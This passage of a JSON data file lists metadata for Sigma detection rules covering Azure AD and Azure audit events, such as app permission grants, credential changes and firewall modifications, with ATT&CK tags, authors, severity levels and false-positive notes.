"tags": [ - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/06/28", - "filename": "azure_ad_device_registration_or_join_without_mfa.yml", - "author": "Michael Epping, '@mepples21'", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert for changes to the device registration policy.", - "uuid": "9494bff8-959f-4440-bbce-fb87a208d517", - "value": "Changes to Device Registration Policy", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_policy_changes.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484" - ], - "creation_date": "2022/06/28", - "filename": "azure_ad_device_registration_policy_changes.yml", - "author": "Michael Epping, '@mepples21'", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detect failed authentications from countries you do not operate out of.", - "uuid": "28870ae4-6a13-4616-bd1a-235a7fad7458", - "value": "Failed Authentications From Countries You Do Not Operate Out Of", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml" - ], - "tags": [ - "attack.t1078" - ], - "creation_date": "2022/07/28", - "filename": "azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml", - "author": "MikeDuddington, '@dudders1'", - "level": "low", - "falsepositive": [ - "If this was approved by System 
Administrator." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects guest users being invited to tenant by non-approved inviters", - "uuid": "4ad97bf5-a514-41a4-abd3-4f3455ad4865", - "value": "Guest Users Invited To Tenant By Non Approved Inviters", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml" - ], - "tags": [ - "attack.t1078" - ], - "creation_date": "2022/07/28", - "filename": "azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml", - "author": "MikeDuddington, '@dudders1'", - "level": "medium", - "falsepositive": [ - "If this was approved by System Administrator." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detect when users are authenticating without MFA being required.", - "uuid": "28eea407-28d7-4e42-b0be-575d5ba60b2c", - "value": "Azure AD Only Single Factor Authentication Required", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_only_single_factor_auth_required.yml" - ], - "tags": [ - "attack.t1078" - ], - "creation_date": "2022/07/27", - "filename": "azure_ad_only_single_factor_auth_required.yml", - "author": "MikeDuddington, '@dudders1'", - "level": "low", - "falsepositive": [ - "If this was approved by System Administrator." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert for sign-ins where the device was non-compliant.", - "uuid": "4f77e1d7-3982-4ee0-8489-abf2d6b75284", - "value": "Sign-ins from Non-Compliant Devices", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_noncompliant_devices.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/06/28", - "filename": "azure_ad_sign_ins_from_noncompliant_devices.yml", - "author": "Michael Epping, '@mepples21'", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.", - "uuid": "4d136857-6a1a-432a-82fc-5dd497ee5e7c", - "value": "Sign-ins by Unknown Devices", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_unknown_devices.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/06/28", - "filename": "azure_ad_sign_ins_from_unknown_devices.yml", - "author": "Michael Epping, '@mepples21'", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Monitor and alert for users added to device admin roles.", - "uuid": "11c767ae-500b-423b-bae3-b234450736ed", - "value": "Users Added to Global or Device Admin Roles", - "meta": { - "refs": [ - 
"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_users_added_to_device_admin_roles.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1078" - ], - "creation_date": "2022/06/28", - "filename": "azure_ad_users_added_to_device_admin_roles.yml", - "author": "Michael Epping, '@mepples21'", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "User Added to an Administrator's Azure AD Role", - "uuid": "ebbeb024-5b1d-4e16-9c0c-917f86c708a7", - "value": "User Added to an Administrator's Azure AD Role", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1098/003/", - "https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098.003" - ], - "creation_date": "2021/10/04", - "filename": "azure_ad_user_added_to_admin_role.yml", - "author": "Rapha\u00ebl CALVET, @MetallicHack", - "level": "medium", - "falsepositive": [ - "PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a application is deleted in Azure.", - "uuid": "410d2a41-1e6d-452f-85e5-abdd8257a823", - "value": "Azure Application Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_deleted.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2021/09/03", - "filename": "azure_application_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Application being deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a application gateway is modified or deleted.", - "uuid": "ad87d14e-7599-4633-ba81-aeb60cfe8cd6", - "value": "Azure Application Gateway Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/16", - "filename": "azure_application_gateway_modified_or_deleted.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Application gateway being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a application security group is modified or deleted.", - "uuid": "835747f1-9329-40b5-9cc3-97d465754ce6", - "value": "Azure Application Security Group Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/16", - "filename": "azure_application_security_group_modified_or_deleted.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Application security group being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a configuration change is made to an applications AppID URI.", - "uuid": "1b45b0d1-773f-4f23-aedc-814b759563b1", - "value": "Application AppID Uri Configuration Changes", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_appid_uri_changes.yml" - ], - "tags": [ - "attack.t1528", - "attack.persistence", - "attack.credential_access" - ], - "creation_date": "2022/06/02", - "filename": "azure_app_appid_uri_changes.yml", - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "level": "high", - "falsepositive": [ - "When and administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a new credential is added to an existing application. 
Any additional credentials added outside of expected processes could be a malicious actor using those credentials.", - "uuid": "cbb67ecc-fb70-4467-9350-c910bdf7c628", - "value": "Added Credentials to Existing Application", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_added.yml" - ], - "tags": [ - "attack.t1098", - "attack.persistence" - ], - "creation_date": "2022/05/26", - "filename": "azure_app_credential_added.yml", - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "level": "high", - "falsepositive": [ - "When credentials are added/removed as part of the normal working hours/workflows" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a application credential is modified.", - "uuid": "cdeef967-f9a1-4375-90ee-6978c5f23974", - "value": "Azure Application Credential Modified", - "meta": { - "refs": [ - "https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_modification.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/02", - "filename": "azure_app_credential_modification.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Application credential added may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when highly privileged delegated permissions are granted on behalf of all users", - "uuid": "a6355fbe-f36f-45d8-8efc-ab42465cbc52", - "value": "Delegated Permissions Granted For All Users", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_delegated_permissions_all_users.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2022/07/28", - "filename": "azure_app_delegated_permissions_all_users.yml", - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "level": "high", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.\nIf this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.\nThis can be a misconfigured application or potentially something malicious.\n", - "uuid": "248649b7-d64f-46f0-9fb2-a52774166fb5", - "value": "Application Using Device Code Authentication Flow", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_device_code_authentication.yml" - ], - "tags": [ - "attack.t1078", - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.initial_access" - ], - "creation_date": "2022/06/01", - "filename": 
"azure_app_device_code_authentication.yml", - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "level": "medium", - "falsepositive": [ - "Applications that are input constrained will need to use device code flow and are valid authentications." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when an end user consents to an application", - "uuid": "9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a", - "value": "End User Consent", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-consent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2022/07/28", - "filename": "azure_app_end_user_consent.yml", - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when end user consent is blocked due to risk-based consent.", - "uuid": "7091372f-623c-4293-bc37-20c32b3492be", - "value": "End User Consent Blocked", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-stopped-due-to-risk-based-consent", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent_blocked.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2022/07/10", - "filename": "azure_app_end_user_consent_blocked.yml", - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a 
new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.", - "uuid": "74298991-9fc4-460e-a92e-511aa60baec1", - "value": "Added Owner To Application", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_owner_added.yml" - ], - "tags": [ - "attack.t1528", - "attack.persistence", - "attack.credential_access", - "attack.defense_evasion" - ], - "creation_date": "2022/06/02", - "filename": "azure_app_owner_added.yml", - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "level": "medium", - "falsepositive": [ - "When a new application owner is added by an administrator" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when app permissions (app roles) for other APIs are granted", - "uuid": "ba2a7c80-027b-460f-92e2-57d113897dbc", - "value": "App Permissions Granted For Other APIs", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_for_api.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2022/07/28", - "filename": "azure_app_permissions_for_api.yml", - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "level": "medium", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD", - "uuid": 
"c1d147ae-a951-48e5-8b41-dcd0170c7213", - "value": "App Granted Microsoft Permissions", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_msft.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2022/07/10", - "filename": "azure_app_permissions_msft.yml", - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "level": "high", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions", - "uuid": "5aecf3d5-f8a0-48e7-99be-3a759df7358f", - "value": "App Granted Privileged Delegated Or App Permissions", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_privileged_permissions.yml" - ], - "tags": [ - "attack.privilege_escalation" - ], - "creation_date": "2022/07/28", - "filename": "azure_app_privileged_permissions.yml", - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "level": "high", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "logsource.category": "No established category", - "logsource.product": "microsoft365portal" - } - }, - { - "description": "Detects when an app is assigned Azure AD roles, such as global adminsitrator, or Azure RBAC roles, such as subscription owner.", - "uuid": "b04934b2-0a68-4845-8a19-bdfed3a68a7a", - "value": "App Role Added", - "meta": { - "refs": [ 
- "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#service-principal-assigned-to-a-role", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_role_added.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/19", - "filename": "azure_app_role_added.yml", - "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", - "level": "medium", - "falsepositive": [ - "When the permission is legitimately needed for the app" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.\nThe application then uses those credentials to authenticate the user against the identity provider.\n", - "uuid": "55695bc0-c8cf-461f-a379-2535f563c854", - "value": "Applications That Are Using ROPC Authentication Flow", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_ropc_authentication.yml" - ], - "tags": [ - "attack.t1078", - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.initial_access" - ], - "creation_date": "2022/06/01", - "filename": "azure_app_ropc_authentication.yml", - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "level": "medium", - "falsepositive": [ - "Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a configuration change is made to an applications 
URI.\nURIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated.\n", - "uuid": "0055ad1f-be85-4798-83cf-a6da17c993b3", - "value": "Application URI Configuration Changes", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_uri_modifications.yml" - ], - "tags": [ - "attack.t1528", - "attack.persistence", - "attack.credential_access" - ], - "creation_date": "2022/06/02", - "filename": "azure_app_uri_modifications.yml", - "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", - "level": "high", - "falsepositive": [ - "When and administrator is making legitimate URI configuration changes to an application. This should be a planned event." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when an account is disabled or blocked for sign in but tried to log in", - "uuid": "4afac85c-224a-4dd7-b1af-8da40e1c60bd", - "value": "Account Disabled or Blocked for Sign in Attempts", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_blocked_account_attempt.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ], - "creation_date": "2022/06/17", - "filename": "azure_blocked_account_attempt.yml", - "author": "Yochana Henderson, '@Yochana-H'", - "level": "medium", - "falsepositive": [ - "Account disabled or blocked in error", - "Automation account has been blocked or disabled" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access.", - "uuid": "4d78a000-ab52-4564-88a5-7ab5242b20c7", - "value": "Change to Authentication Method", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_change_to_authentication_method.yml" - ], - "tags": [ - "attack.credential_access" - ], - "creation_date": "2021/10/10", - "filename": "azure_change_to_authentication_method.yml", - "author": "AlertIQ", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Define a baseline threshold for failed sign-ins due to Conditional Access failures", - "uuid": "b4a6d707-9430-4f5f-af68-0337f52d5c42", - "value": "Sign-in Failure Due to 
Conditional Access Requirements Not Met", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_conditional_access_failure.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1110" - ], - "creation_date": "2022/06/01", - "filename": "azure_conditional_access_failure.yml", - "author": "Yochana Henderson, '@Yochana-H'", - "level": "high", - "falsepositive": [ - "Service Account misconfigured", - "Misconfigured Systems", - "Vulnerability Scanners" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Detects when a Container Registry is created or deleted.", - "uuid": "93e0ef48-37c8-49ed-a02c-038aab23628e", - "value": "Azure Container Registry Created or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", - "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", - "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", - "https://attack.mitre.org/matrices/enterprise/cloud/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/07", - "filename": "azure_container_registry_created_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "low", - "falsepositive": [ - "Container Registry being created or deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Number of VM creations or deployment activities occur in Azure via the azureactivity log.", - "uuid": "d2d901db-7a75-45a1-bc39-0cbf00812192", - "value": "Number Of Resource Creation Or Deployment Activities", - "meta": { - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Creating_Anomalous_Number_Of_Resources_detection.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_creating_number_of_resources_detection.yml" - ], - "tags": [ - "attack.t1098" - ], - "creation_date": "2020/05/07", - "filename": "azure_creating_number_of_resources_detection.yml", - "author": "sawwinnnaung", - "level": "medium", - "falsepositive": [ - "Valid change" - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a device in azure is no longer managed or compliant", - "uuid": "542b9912-c01f-4e3f-89a8-014c48cdca7d", - "value": "Azure Device No Longer Managed or Compliant", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_no_longer_managed_or_compliant.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/03", - "filename": "azure_device_no_longer_managed_or_compliant.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Administrator may have forgotten to review the device." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a device or device configuration in azure is modified or deleted.", - "uuid": "46530378-f9db-4af9-a9e5-889c177d3881", - "value": "Azure Device or Configuration Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/09/03", - "filename": "azure_device_or_configuration_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Device or device configuration being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when DNS zone is modified or deleted.", - "uuid": "af6925b0-8826-47f1-9324-337507a0babd", - "value": "Azure DNS Zone Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_dns_zone_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_dns_zone_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
- ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when an user or application modified the federation settings on the domain.", - "uuid": "352a54e1-74ba-4929-9d47-8193d67aba1e", - "value": "Azure Domain Federation Settings Modified", - "meta": { - "refs": [ - "https://attack.mitre.org/techniques/T1078", - "https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_federation_modified.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1078" - ], - "creation_date": "2021/09/06", - "filename": "azure_federation_modified.yml", - "author": "Austin Songer", - "level": "medium", - "falsepositive": [ - "Federation Settings being modified or deleted may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when a firewall is created, modified, or deleted.", - "uuid": "512cf937-ea9b-4332-939c-4c2c94baadcd", - "value": "Azure Firewall Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_firewall_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Firewall being modified or deleted may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "No established category", - "logsource.product": "azure" - } - }, - { - "description": "Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.", - "uuid": "025c9fe7-db72-49f9-af0d-31341dd7dd57", - "value": "Azure Firewall Rule Collection Modified or Deleted", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", - "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml" - ], - "tags": [ - "attack.impact" - ], - "creation_date": "2021/08/08", - "filename": "azure_firewall_rule_collection_modified_or_deleted.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
